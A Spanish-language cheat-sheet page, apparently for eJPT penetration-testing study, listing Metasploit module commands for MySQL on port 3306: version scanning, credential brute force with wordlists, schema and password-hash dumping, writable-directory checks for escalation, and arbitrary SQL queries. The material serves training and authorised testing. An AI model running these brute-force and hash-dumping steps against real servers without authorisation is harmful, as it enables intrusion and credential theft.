> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-cheatsheet/enumeracion-mysql-3306.md).

# Enumeración MySQL (3306)

## 🔍 1. Detección y Enumeración de Versión

#### [`mysql_version`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_version)

Enumera la versión del servidor MySQL expuesto.

```bash
use auxiliary/scanner/mysql/mysql_version
set RHOSTS <IP>
run
```

***

## 🔐 2. Fuerza Bruta de Credenciales

#### [`mysql_login`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_login)

Prueba múltiples combinaciones de usuarios y contraseñas.

```bash
use auxiliary/scanner/mysql/mysql_login
set RHOSTS <IP>
set USER_FILE /usr/share/wordlists/usernames.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
run
```

***

## 📚 3. Enumeración del Servidor (Requiere login exitoso)

#### [`mysql_enum`](https://www.rapid7.com/db/modules/auxiliary/admin/mysql/mysql_enum)

Recoge información básica del servidor: versión, usuarios, variables globales, etc.

```bash
use auxiliary/admin/mysql/mysql_enum
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
run
```

***

## 🗃️ 4. Dump de Bases de Datos y Esquemas

#### [`mysql_schemadump`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_schemadump)

Extrae el esquema completo de todas las bases de datos (tablas, columnas).

```bash
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
run
```

***

## 💾 5. Exploración de Archivos Internos

#### [`mysql_file_enum`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_file_enum)

Busca rutas de archivos configurados dentro del servidor.

```bash
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
run
```

***

## 🔑 6. Hashdump de Credenciales

#### [`mysql_hashdump`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_hashdump)

Obtiene los hashes de contraseñas de los usuarios MySQL (si es posible).

```bash
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
run
```

Puedes crackearlos luego con `john` o `hashcat`.

***

## 🧬 7. Verificación de Directorios Escritura

#### [`mysql_writable_dirs`](https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_writable_dirs)

Identifica directorios en el servidor donde el usuario tiene permisos de escritura. Muy útil para **escaladas de privilegios o RCE**.

```bash
use auxiliary/scanner/mysql/mysql_writable_dirs
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
run
```

***

## 💻 8. Ejecución de Consultas SQL

#### [`mysql_sql`](https://www.rapid7.com/db/modules/auxiliary/admin/mysql/mysql_sql)

Permite enviar consultas SQL manuales al servidor.

```bash
use auxiliary/admin/mysql/mysql_sql
set RHOSTS <IP>
set USERNAME <usuario>
set PASSWORD <contraseña>
set SQL 'SHOW DATABASES;'
run
```
